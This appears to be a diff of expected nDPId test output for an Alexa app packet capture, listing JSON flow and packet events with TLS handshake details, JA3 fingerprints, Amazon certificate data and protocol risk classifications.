{"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, 
O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} +00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2892,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195983,"flow_last_seen":1490976196039,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196039,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2894,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195983,"flow_last_seen":1490976196041,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196041,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2910,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":1490976196075,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976196075,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwIa5AAOcGR5A27xyyrBAq2AG74sBbwNFvZBCniXASH\/4cPAAAAgQFtAEDAwY="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2911,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_packet_id":3,"flow_last_seen":1490976196075,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976196075,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoLWpAAEAG4tysECrYNu8csuLAAbtkEKeJW8DRcFAQAVdmrQAA"} 
-00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2913,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196016,"flow_last_seen":1490976196079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196079,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01100{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2929,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976196016,"flow_last_seen":1490976196143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196143,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} -00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976071237,"flow_last_seen":1490976075957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2126,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1490976071286,"flow_last_seen":1490976075975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8626,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976071306,"flow_last_seen":1490976075950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5104,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976071349,"flow_last_seen":1490976075957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4754,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976071380,"flow_last_seen":1490976075949,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6831,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1490976071385,"flow_last_seen":1490976075957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":675,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1490976071583,"flow_last_seen":1490976075957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":33,"flow_first_seen":1490976064452,"flow_last_seen":1490976068180,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17572,"flow_avg_l4_payload_len":532,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976064328,"flow_last_seen":1490976064897,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5630,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2913,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196016,"flow_last_seen":1490976196079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196079,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01100{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2929,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976196016,"flow_last_seen":1490976196143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196143,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976071237,"flow_last_seen":1490976075957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2126,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} 
+00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976071286,"flow_last_seen":1490976075975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8626,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976071306,"flow_last_seen":1490976075950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5104,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976071349,"flow_last_seen":1490976075957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4754,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976071380,"flow_last_seen":1490976075949,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6831,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00807{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1490976071385,"flow_last_seen":1490976075957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":675,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00807{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1490976071583,"flow_last_seen":1490976075957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1490976064452,"flow_last_seen":1490976068180,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17572,"flow_avg_l4_payload_len":532,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976064328,"flow_last_seen":1490976064897,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5630,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196223,"flow_last_seen":1490976196223,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976196223,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1490976196223,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196223,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Y0xAAEAG+qKsECrYNFXRj5ZTAbu3TOm6AAAAAKAC\/\/+mLwAAAgQFtAQCCAoA9or2AAAAAAEDAwg="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2943,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1490976196257,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196257,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqu40VdGPrBAq2AG7llOp3LO0t0zpu6AScSBd6wAAAgQFtAQCCApt5QucAPaK9gEDAwg="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2944,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1490976196259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196259,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0Y01AAEAG+qmsECrYNFXRj5ZTAbu3TOm7qdyztYAQAVf8fgAAAQEICgD2ivlt5Quc"} 
-01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2945,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196223,"flow_last_seen":1490976196261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976196261,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01128{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2950,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976196223,"flow_last_seen":1490976196300,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1642,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1490976196300,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01601{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2952,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976196223,"flow_last_seen":1490976196301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3656,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1490976196301,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} 
+01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2945,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196223,"flow_last_seen":1490976196261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976196261,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 